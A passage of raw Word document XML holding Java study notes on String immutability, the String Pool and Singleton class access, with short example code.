          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can help improve memory usage and reduce overhead by reusing string literals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7041806D" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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2. String Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE8BEA6" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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String Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Constant Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) is a special area of memory in the Java heap where string literals are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6B341" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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a String literal is created, Java first checks whether the string already exists in the pool. If it does, it reuses the existing string reference, thereby saving memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77B35C" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2895BA" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 str1 = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76050172" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 str2 = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39155C70" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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str1 == str2);  // true, both refer to the same object in the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03880F6E" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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you create a String using the new keyword, it may be placed in the heap, but you can also intern it to store it in the String Pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4A12A" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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Efficient Memory Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3367968F" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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ce strings are immutable, the JVM can optimize memory usage and reduce the number of objects created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2807BEAC" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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tring pool allows the reuse of identical strings, saving memory for large applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2A9457" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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String Concatenation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889AEDD" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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concatenate strings using the + operator, a new String object is created for every concatenation. This is because String is immutable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75062548" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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owever, when multiple concatenations are done inside loops, it's better to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StringBuilder</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StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid creating too many intermediate String objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D12290" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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Equals and Hashcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2794E6" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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String class overrides the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equal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hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods from the Object class to compare strings based on their values, not references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72882A4C" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ensures that strings with the same content have the same hash code and are considered equal, which is critical when strings are used as keys in hash-based collections like HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB916E" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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Efficiency in Search Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897117C" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ecause strings are immutable and their state cannot be altered, operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>searching</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pattern matching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are made faster, especially when combined with string pooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686AADF" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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immutability also makes them ideal for use as keys in collections like HashMap, where consistency is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67560B45" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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7. Thread Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFB433C" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53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ce String objects are immutable, they are inherently thread-safe, meaning they can be safely used by multiple threads simultaneously without additional synchronization mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F4796" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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307A29D3" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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tringExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A33F72" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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66C5D04E" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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str1 = "Hello";  // Created in the string pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD51CA6" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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str2 = "Hello";  // Reused from the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B8DDC1" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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str3 = new String("Hello");  // Created in the heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661FF999" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B73D2B" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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hecking if str1 and str2 refer to the same object in the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B28B9D" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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tr1 == str2); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A2DC93" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF4EBBD" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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hecking if str1 and str3 refer to the same object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780480B5" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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tr1 == str3); // false (str3 is in heap, str1 is in the pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA91CB" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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9480444" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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AD897A4" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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423E60FE" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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immutable nature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the String class is the defining feature, which provides benefits such as thread safety, memory optimization, and reliable equality checks. The use of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> further enhances efficiency by reusing string literals across the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5C2DEB" w14:textId="0D485007" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028064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92AE2B7">
          <v:rect id="_x0000_i1231" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B30DE" w14:textId="3DE2C1F3" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="009308A9" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc196307566"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How to access Singleton class from another class</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="4601C1C0" w14:textId="74EB2430" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="004C6167">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o access a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from another class in Java, you follow the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton Design Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The main idea behind this pattern is to ensure that a class has only one instance and provides a global point of access to that instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C72C6EE"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s how you can implement and access a Singleton class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A466CAE" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C"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ep-by-Step Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC42F58" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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reate a Singleton Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43591E88" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ingleton class has a private static reference to itself and a private constructor to prevent instantiation from outside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF51FE5" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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provides a public method (typically named getInstance()) to get the instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D581E2" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 Singleton Class from Another Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E4B850" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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other class can access the Singleton instance by calling the getInstance() method of the Singleton class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F7641" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C"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4CE8875C" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C"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ep 1: Singleton Class Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9DB60F"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305E0490"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tep 1: Create a private static instance of the class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1DB1C"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atic Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F8FFE"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46406C6"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tep 2: Make the constructor private so it cannot be instantiated from outside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64AB60"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ingleton() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F6CB9"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onstructor logic (if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CACFF3"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6984F7A" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2DEFFB"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tep 3: Provide a public static method to get the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C6945"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393F43EC"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instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1D95FE"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If the instance is null, create a new one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49100245"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stance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633F879"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2CFE08C"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instance; // Return the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE6233D"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6E2C6D5" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F2B3E4"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 method to demonstrate some functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC1BD9"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showMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F554DB"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Hello from Singleton!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC54DAC"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F41797B"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DDE2DCA" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C"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ep 2: Access Singleton from Another Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F6A83"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7BF5EC0B"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246D54A3"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ccessing Singleton instance using getInstance method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1154C7C3"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ingleton singleton = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C802F72"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CA91DAD"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ll the showMessage method of the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE45A06"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ingleton.showMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795E92C2"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C3122F9"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onfirming that it's the same instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44178618"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ingleton singleton2 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5580262D"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ingleton == singleton2); // true, both refer to the same instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304575EC"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3C9B5F3"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C56159A" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D878532" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53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ivate static instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The instance field is static and private, meaning only the Singleton class can access it directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D973F" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53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Private constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The constructor is private, so no other class can directly instantiate a Singleton object using new Singleton().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B701BAF" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53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blic static getInstance() method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This method checks if the instance is already created. If not, it creates a new one. This ensures that only one instance of the class exists (singleton). It returns the single instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2F393" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53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ing the Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
